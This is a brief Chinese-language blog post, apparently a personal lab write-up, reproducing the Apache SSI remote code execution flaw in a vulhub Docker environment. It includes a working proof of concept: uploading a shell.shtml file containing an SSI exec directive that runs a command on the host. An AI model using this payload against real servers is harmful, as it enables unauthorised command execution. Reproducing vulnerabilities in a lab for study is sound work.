Apache SSI RCE

 Apache SSI RCE

前言 : 

前陣子群組的夥伴,在做公司的滲透專案時找了到 Apache SSI RCE 漏洞,筆者當初有點迷,畢竟自己的廣度還不夠廣,一時心血來潮,想增加一點不一樣的滲透姿勢,之後在 Bug Bounty 也用的到,於是自己實作一次復現漏洞。

內文 : 

和上次復現的 Apache Solr 差不多,使用 docker 搭建就好。

環境搭建 :
service apache2 restart (啟動 Apache Services)
docker-compose up -d (/vulhub/httpd/ssi-rce) 

實戰當中可能先用掃描器(burpsuite/AWVS/Xray等) 先掃看有沒有存在 Apache SSI RCE 漏洞,並找出上傳點 0.0

正常上傳 PHP 文件是不能的,可以上傳一個 shell.shtml 文件
PoC : 
<!--#exec cmd="id" -->

找到上傳路徑並訪問,就直接 RCE 這台主機。

廣度是需要持之以恆地去學習,否則筆者自己會覺得思路會被限制住,往往沒辦法找出遺漏的漏洞點在哪裡,雖然現在因為工作關係沒太多時間進行復現漏洞,環境使筆者學習的面相比較侷限一些,但我相信凡走過必留下痕跡,就像朋友圈的大佬所說的一樣,還是沉澱的去學習就好,那才是真的。

留言

熱門文章